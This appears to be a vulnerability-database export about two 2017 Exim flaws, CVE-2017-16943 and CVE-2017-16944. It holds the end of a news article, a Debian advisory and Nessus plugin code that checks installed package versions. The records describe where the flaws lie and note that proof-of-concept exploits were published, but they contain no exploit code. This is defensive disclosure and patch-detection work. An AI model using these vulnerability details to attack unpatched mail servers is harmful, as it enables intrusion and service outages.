\"Through our research, we confirm that this vulnerability can be exploited to remote code execution if the binary is not compiled with PIE.\"\n\nThe researcher ([mehqq_](<https://twitter.com/mehqq_>)) has also published a Proof-of-Concept (PoC) exploit code written in python that could allow anyone to gain code execution on vulnerable Exim servers. \n \nThe second vulnerability, identified as [CVE-2017-16944](<https://bugs.exim.org/show_bug.cgi?id=2201>), is a denial of service (DoS) flaw that could allow a remote attacker to hang Exim servers even the connection is closed by forcing it to run in an infinite loop without crashing. \n \nThe flaw exists due to improper checking for a '.' character to signify the end of an email when parsing the BDAT data header. \n\n\n> \"The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function,\" the vulnerability [description](<https://nvd.nist.gov/vuln/detail/CVE-2017-16944>) reads.\n\nThe researcher has also included a proof-of-concept (PoC) exploit for this vulnerability as well, making Exim server run out of stack and crash. 
\n \nBoth vulnerabilities reside in Exim version 4.88 and 4.89, and sysadmins are recommended to update their mail transfer agent application [Exim version 4.90](<https://github.com/Exim/exim>) released on GitHub.\n", "modified": "2017-11-27T11:13:58", "published": "2017-11-26T22:54:00", "id": "THN:EE92331B07B64A7332ABABDA5C30ACC1", "href": "https://thehackernews.com/2017/11/exim-internet-mailer-flaws.html", "type": "thn", "title": "Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:58", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4053-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 30, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2017-16943 CVE-2017-16944\nDebian Bug : 882648 882671\n\nSeveral vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\n\n A use-after-free vulnerability was discovered in Exim's routines\n responsible for parsing mail headers. A remote attacker can take\n advantage of this flaw to cause Exim to crash, resulting in a denial\n of service, or potentially for remote code execution.\n\nCVE-2017-16944\n\n It was discovered that Exim does not properly handle BDAT data\n headers allowing a remote attacker to cause Exim to crash, resulting\n in a denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.89-2+deb9u2. 
Default installations disable advertising the\nESMTP CHUNKING extension and are not affected by these issues.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-11-30T08:03:04", "published": "2017-11-30T08:03:04", "id": "DEBIAN:DSA-4053-1:6BF76", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00316.html", "title": "[SECURITY] [DSA 4053-1] exim4 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T06:52:37", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues :\n\n - CVE-2017-16943\n A use-after-free vulnerability was discovered in Exim", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-4053.NASL", "href": "https://www.tenable.com/plugins/nessus/104940", "published": "2017-12-01T00:00:00", "title": "Debian DSA-4053-1 : exim4 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4053. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104940);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"DSA\", value:\"4053\");\n\n script_name(english:\"Debian DSA-4053-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues :\n\n - CVE-2017-16943\n A use-after-free vulnerability was discovered in Exim's\n routines responsible for parsing mail headers. A remote\n attacker can take advantage of this flaw to cause Exim\n to crash, resulting in a denial of service, or\n potentially for remote code execution.\n\n - CVE-2017-16944\n It was discovered that Exim does not properly handle\n BDAT data headers allowing a remote attacker to cause\n Exim to crash, resulting in a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=882648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=882671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16943\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-4053\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.89-2+deb9u2. Default installations disable advertising\nthe ESMTP CHUNKING extension and are not affected by these issues.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:39:14", "bulletinFamily": "scanner", "description": "Use-after-free in receive_msg function via vectors involving BDAT\ncommands\n\nThe receive_msg function in receive.c in the SMTP 
daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT\ncommands. (CVE-2017-16943)\n\nInfinite loop and stack exhaustion in receive_msg function via vectors\ninvolving BDAT commands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a ", "modified": "2019-12-02T00:00:00", "id": "ALA_ALAS-2017-932.NASL", "href": "https://www.tenable.com/plugins/nessus/105417", "published": "2017-12-26T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2017-932)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-932.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105417);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"ALAS\", value:\"2017-932\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free in receive_msg function via vectors involving BDAT\ncommands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT\ncommands. 
(CVE-2017-16943)\n\nInfinite loop and stack exhaustion in receive_msg function via vectors\ninvolving BDAT commands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a '.' character signifying the end\nof the content, related to the bdat_getc function. (CVE-2017-16944)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-932.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.89-4.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:04:30", "bulletinFamily": "scanner", "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2017-0032BAA7D7.NASL", "href": "https://www.tenable.com/plugins/nessus/105196", "published": "2017-12-13T00:00:00", "title": "Fedora 26 : exim (2017-0032baa7d7)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0032baa7d7.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105196);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0032baa7d7\");\n\n script_name(english:\"Fedora 26 : exim (2017-0032baa7d7)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0032baa7d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"exim-4.89-7.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:35:43", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201803-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-201803-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107178", "published": "2018-03-07T00:00:00", "title": "GLSA-201803-01 : Exim: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-01.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107178);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/30 14:30:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\", \"CVE-2018-6789\");\n script_xref(name:\"GLSA\", value:\"201803-01\");\n\n script_name(english:\"GLSA-201803-01 : Exim: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.90.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.90.1\"), vulnerable:make_list(\"lt 4.90.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:30:21", "bulletinFamily": "scanner", "description": "Exim developers team reports :\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a ", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "href": "https://www.tenable.com/plugins/nessus/104944", "published": "2017-12-01T00:00:00", "title": "FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and 
contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104944);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/10 16:10:17\");\n\n script_cve_id(\"CVE-2017-16944\");\n\n script_name(english:\"FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Exim developers team reports :\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a '.' 
